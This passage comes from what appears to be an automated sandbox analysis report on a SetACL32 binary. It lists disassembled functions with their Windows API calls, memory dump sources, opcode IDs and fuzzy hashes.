                • std::_Lockit::_Lockit.LIBCPMT ref: 00F5B1B3
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F5B1D5
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F5B1F5
                • __Getctype.LIBCPMT ref: 00F5B294
                • std::_Facet_Register.LIBCPMT ref: 00F5B2E1
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F5B2F9
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                • String ID:
                • API String ID: 1102183713-0
                • Opcode ID: c827d2d0079d601a9c8c124d63fa601e6c300b271d0d6d45725a3adeee7a270d
                • Instruction ID: e50fa3e235d4cf2d7fecfb934270f943666e7984d2700c95adeae6348a7b768b
                • Opcode Fuzzy Hash: c827d2d0079d601a9c8c124d63fa601e6c300b271d0d6d45725a3adeee7a270d
                • Instruction Fuzzy Hash: FF510171D00608CFDB11DF58CA82BAAB7B4FF14310F148269ED499B252EB34B945EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F673F0 Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                Download Yara Rule
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F67430
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F67452
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F67472
                • __Getctype.LIBCPMT ref: 00F6750B
                • std::_Facet_Register.LIBCPMT ref: 00F6752A
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F67542
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                • String ID:
                • API String ID: 1102183713-0
                • Opcode ID: c15283609712ddd3137b565fb26977159eb284f6ae289138f4d0f52d9e2c1a83
                • Instruction ID: 3244c336105acd36de2cd05165a37b3b1c5830eafd6b809a8b04083b510d7bd4
                • Opcode Fuzzy Hash: c15283609712ddd3137b565fb26977159eb284f6ae289138f4d0f52d9e2c1a83
                • Instruction Fuzzy Hash: 4041B171D04308CFDB10EF18D986AAABBB4EF04724F144169E84697391EB35AD45EB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F89020 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 285COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID: @M)w
                • API String ID: 0-1211491014
                • Opcode ID: 6f31556cee699b08aa5aebfc2f2db4a137d13e0ac9acfe34cf697fca6224f0dc
                • Instruction ID: 5e64ce4fed536eb359fd3c5915d57f6d59266ec2c558c287514e9fcd6792757d
                • Opcode Fuzzy Hash: 6f31556cee699b08aa5aebfc2f2db4a137d13e0ac9acfe34cf697fca6224f0dc
                • Instruction Fuzzy Hash: 5DB18E71D042089FDB14EFA4CC84BEEBBB9FF44310F18455DE816AB291DBB4A905EB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F690C0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 263timeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,746D712B,?,00000000,772EF6D0), ref: 00F69123
                • FileTimeToSystemTime.KERNEL32(?,?,?,00000000,772EF6D0), ref: 00F69140
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,00000000,772EF6D0), ref: 00F69150
                • FileTimeToLocalFileTime.KERNEL32(?,?,?,00000000,772EF6D0), ref: 00F69164
                Strings
                • %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d, xrefs: 00F6926B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Time$File$System$Local$Specific
                • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d
                • API String ID: 3144155402-169632472
                • Opcode ID: 96d95e7b008c9582e45d40c8c454284810a2fcd7aa2d859fc1fc98e2a0a6f80f
                • Instruction ID: ae49d49ee3a4a2c7e09308384f232083de3c30a245a3949d057647a988c62787
                • Opcode Fuzzy Hash: 96d95e7b008c9582e45d40c8c454284810a2fcd7aa2d859fc1fc98e2a0a6f80f
                • Instruction Fuzzy Hash: 07B12B71A4021E8FCB28DF54C894BEDBBB5EB48300F1085E9D91EB7741EB745A889F50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA74EC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00FA75BC
                • _free.LIBCMT ref: 00FA75E5
                • SetEndOfFile.KERNEL32(00000000,00FA7131,00000000,00FA6A25,?,?,?,?,?,?,?,00FA7131,00FA6A25,00000000), ref: 00FA7617
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00FA7131,00FA6A25,00000000,?,?,?,?,00000000), ref: 00FA7633
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFileLast
                • String ID: @M)w
                • API String ID: 1547350101-1211491014
                • Opcode ID: 8c22d81bd8270bf700f4e97c502ce70cecbcbf1ca56ac2493edf7fa6e88bd3fd
                • Instruction ID: 0216f8d05d627e48ec881adc32340c75a06d959f20ad4ea9754fbc4adddfa3a5
                • Opcode Fuzzy Hash: 8c22d81bd8270bf700f4e97c502ce70cecbcbf1ca56ac2493edf7fa6e88bd3fd
                • Instruction Fuzzy Hash: 3441C1F2D047019FDF11BBA88C46F9E77A9AF86370F280510F514E6291EA38DD45BB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                • _free.LIBCMT ref: 00F97282
                • _free.LIBCMT ref: 00F972B8
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID: @M)w
                • API String ID: 2283115069-1211491014
                • Opcode ID: 51bfdc1cc5fd6accd7db1df13e416206a556db25e2a3e10ecc1df74859ed38b9
                • Instruction ID: 513ca4491b9babc6e0dd13194585fc646550c56af461e70ec9a19f5fec165187
                • Opcode Fuzzy Hash: 51bfdc1cc5fd6accd7db1df13e416206a556db25e2a3e10ecc1df74859ed38b9
                • Instruction Fuzzy Hash: FA11E93273C3056EFF1137B55C8BE2A317AABC27757280225F514871E1EE6A8C05F952
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97377 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9737C
                • _free.LIBCMT ref: 00F973D9
                • _free.LIBCMT ref: 00F9740F
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9741A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID: @M)w
                • API String ID: 2283115069-1211491014
                • Opcode ID: e40f52a71f29a8596e885d03ee8f881e7d97ca1c75164aed5ac6022c5d1c9663
                • Instruction ID: 8ec060929e0e6753a97b8592d1acf44981f241b9cba0cc5e34aa7c62199cc974
                • Opcode Fuzzy Hash: e40f52a71f29a8596e885d03ee8f881e7d97ca1c75164aed5ac6022c5d1c9663
                • Instruction Fuzzy Hash: DB11E53262C305AEFF1177B99C8BE2A3569ABC2775B280225F514871E2DE698C05F152
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F965CA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F965BF,?,?,00F96587,?,?,?), ref: 00F965DF
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F965F2
                • FreeLibrary.KERNEL32(00000000,?,?,00F965BF,?,?,00F96587,?,?,?), ref: 00F96615
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 02c1108749dc760ae11dcfe7754b204cad71bb79eadce0d40e5d8a717c0ffed8
                • Instruction ID: d311862cd5b87b76b5cca65c99cfbd9c3df414fbb7f3da6423576595cd5b84cc
                • Opcode Fuzzy Hash: 02c1108749dc760ae11dcfe7754b204cad71bb79eadce0d40e5d8a717c0ffed8
                • Instruction Fuzzy Hash: B9F08C70A01219FBEF119B52DD1ABDEBFB9EB41765F044060E800E21A0CB708E00FE95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA58C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000), ref: 00FA58D7
                • GetLastError.KERNEL32(?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000,00000000,00000000,?,00FA188A,?), ref: 00FA58E3
                  • Part of subcall function 00FA58A9: CloseHandle.KERNEL32(FFFFFFFE,00FA58F3,?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000,00000000,00000000), ref: 00FA58B9
                • ___initconout.LIBCMT ref: 00FA58F3
                  • Part of subcall function 00FA586B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FA589A,00FA48E9,00000000,?,00FA1336,00000000,?,00000000,00000000), ref: 00FA587E
                • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000,00000000), ref: 00FA5908
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID: @M)w
                • API String ID: 2744216297-1211491014
                • Opcode ID: b1a3ddedba83cc8d5b694eaf528520a81747c649511037de82e2a2c94468adc9
                • Instruction ID: 39d9f259cf2071d252e9be3f4bf80ba4b0edf30855867c82a9d458f4310b3b86
                • Opcode Fuzzy Hash: b1a3ddedba83cc8d5b694eaf528520a81747c649511037de82e2a2c94468adc9
                • Instruction Fuzzy Hash: CDF01CB6801528BBCF221F91DC09E8A3F66FF4A7B1B044421FA1996130CA328920FB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F807A0 Relevance: 7.7, APIs: 5, Instructions: 209registryCOMMON
                Download Yara Rule
                APIs
                • SetSecurityInfo.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 00F807DE
                • NetShareGetInfo.NETAPI32(-0000001C,?,00000001,00000000,00000000,?,?,746D712B,00FBFE30,00000003,00000000), ref: 00F809E6
                • NetApiBufferFree.NETAPI32(00000000), ref: 00F80A2E
                • SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,00000000,?,746D712B,00FBFE30,00000003,00000000), ref: 00F80A68
                • NetShareSetInfo.NETAPI32(-0000001C,?,00000001,?,00000000), ref: 00F80ABA
                • CloseHandle.KERNEL32(00000000), ref: 00F80AD7
                • RegCloseKey.ADVAPI32(00000000), ref: 00F80AE8
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Info$CloseSecurityShare$BufferFreeHandleNamed
                • String ID:
                • API String ID: 2758331865-0
                • Opcode ID: 2a8e90f42858b462659f7e8f1de3d840ab210e3faf8c9a884fef1cf50c4ab046
                • Instruction ID: 386de2b9632eb3740c1517839f38cbd25946d94c50ff29c13a8c478f5ddb5f6c
                • Opcode Fuzzy Hash: 2a8e90f42858b462659f7e8f1de3d840ab210e3faf8c9a884fef1cf50c4ab046
                • Instruction Fuzzy Hash: E4817D71E002199BEF64EF64CC55BEE77B4AF04354F844199E809A7241DB34AE88EFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9D807 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                Download Yara Rule
                APIs
                • __alloca_probe_16.LIBCMT ref: 00F9D88B
                • __alloca_probe_16.LIBCMT ref: 00F9D951
                • __freea.LIBCMT ref: 00F9D9BD
                  • Part of subcall function 00F98049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                • __freea.LIBCMT ref: 00F9D9C6
                • __freea.LIBCMT ref: 00F9D9E9
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: __freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 1423051803-0
                • Opcode ID: adac6cee211b2d7e6f2d236124590754e39699e14c41be7a2608e008f9bc70d1
                • Instruction ID: cbb730c9a1b66f66c48cbb97fee6c55b4a5a1d359d8a133ad7888dc5f6f30c42
                • Opcode Fuzzy Hash: adac6cee211b2d7e6f2d236124590754e39699e14c41be7a2608e008f9bc70d1
                • Instruction Fuzzy Hash: 64518172900216ABFF25AF648C42FBF36A9EF857A0F250129FD0497151E678DC11A7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F65C50 Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                Download Yara Rule
                APIs
                • Concurrency::cancel_current_task.LIBCPMT ref: 00F65D01
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D63
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D85
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65DA5
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65F8B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                • String ID:
                • API String ID: 3053331623-0
                • Opcode ID: fe6e0593628fc8c7e65b51ed2f1686885fa692f5392cc2f85e4ea814c8217552
                • Instruction ID: 93e3c00e5165a9bde967ccc7f998c21e5534fc5e56ede59fd3384150c736e0c1
                • Opcode Fuzzy Hash: fe6e0593628fc8c7e65b51ed2f1686885fa692f5392cc2f85e4ea814c8217552
                • Instruction Fuzzy Hash: 2951B272D046099FDB10DF68DD41AAEB7F8EF45720F14416AEC05BB281EB35A901EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F658F0 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                Download Yara Rule
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F6591D
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F6593D
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F6595D
                • std::_Facet_Register.LIBCPMT ref: 00F659FB
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65A13
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                • String ID:
                • API String ID: 459529453-0
                • Opcode ID: 0665a64aae52a8b211747a84f9be91b900c8d4314eeef41900a64ac7282cacec
                • Instruction ID: b94c677689a4b5bc77e2f9ad267546e41f69be2c27ca66dbc7853eb9515f31e7
                • Opcode Fuzzy Hash: 0665a64aae52a8b211747a84f9be91b900c8d4314eeef41900a64ac7282cacec
                • Instruction Fuzzy Hash: 89410771904608DFDB20DF54D982FAAB7B4FF40B24F18415EE846AB342D775AD01EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F69780 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32 ref: 00F697B8
                • LeaveCriticalSection.KERNEL32(00FCB6D4,?,?), ref: 00F69880
                  • Part of subcall function 00F62DD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?), ref: 00F62E67
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFileLeaveModuleName
                • String ID: +qmt$.log$Emergency.log
                • API String ID: 4287384897-2469913045
                • Opcode ID: 02ed90f960971e8323530a00fa2e958905d3a00fd49116d4481d52774a405570
                • Instruction ID: dbc9386691542e3efa0e2e8c1a51e513fefea83b2cd0b81b196312d482e42a1d
                • Opcode Fuzzy Hash: 02ed90f960971e8323530a00fa2e958905d3a00fd49116d4481d52774a405570
                • Instruction Fuzzy Hash: 4331E731A04209DFCB14DFA4CD46BEEB779EF49720F50412DE90267280CBB59944EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97927 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00F9793F
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F97951
                • _free.LIBCMT ref: 00F97963
                • _free.LIBCMT ref: 00F97975
                • _free.LIBCMT ref: 00F97987
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: ee45b3c62fc7a4be5d1122d563fa024512f9aaa6575dd3f5a5ab43dd5075ea80
                • Instruction ID: 2138f8ef5a2a26a5e1ff078dde8d171b9fa9ebc906c358d13f7cab37559e1089
                • Opcode Fuzzy Hash: ee45b3c62fc7a4be5d1122d563fa024512f9aaa6575dd3f5a5ab43dd5075ea80
                • Instruction Fuzzy Hash: 1EF03C32818705ABAE20EF68E98FC5AB3D9EB057607582809F044D7661CB24FC80FA50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8B421 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00FCAA14,00000000,?,00F676D3,00FCB698,00FACF20), ref: 00F8B42B
                • LeaveCriticalSection.KERNEL32(00FCAA14,?,00F676D3,00FCB698,00FACF20), ref: 00F8B45E
                • RtlWakeAllConditionVariable.NTDLL ref: 00F8B4D5
                • SetEvent.KERNEL32(?,00FCB698,00FACF20), ref: 00F8B4DF
                • ResetEvent.KERNEL32(?,00FCB698,00FACF20), ref: 00F8B4EB
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                • String ID:
                • API String ID: 3916383385-0
                • Opcode ID: 4bcb4aa61c12ebe2f784b90401dd465ed098ed26fe331bcd2db2e03d47f49eaa
                • Instruction ID: f605a73a17e06a7676ef144a9ce47bc62f42fd697cd1837d3bc95bf19cbfc79d
                • Opcode Fuzzy Hash: 4bcb4aa61c12ebe2f784b90401dd465ed098ed26fe331bcd2db2e03d47f49eaa
                • Instruction Fuzzy Hash: 560169B1A0462CEFC715AF18FE0AE943BA4FB0A711701446AF90293721CBB46800FB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F81E80 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 441COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F81F6D
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
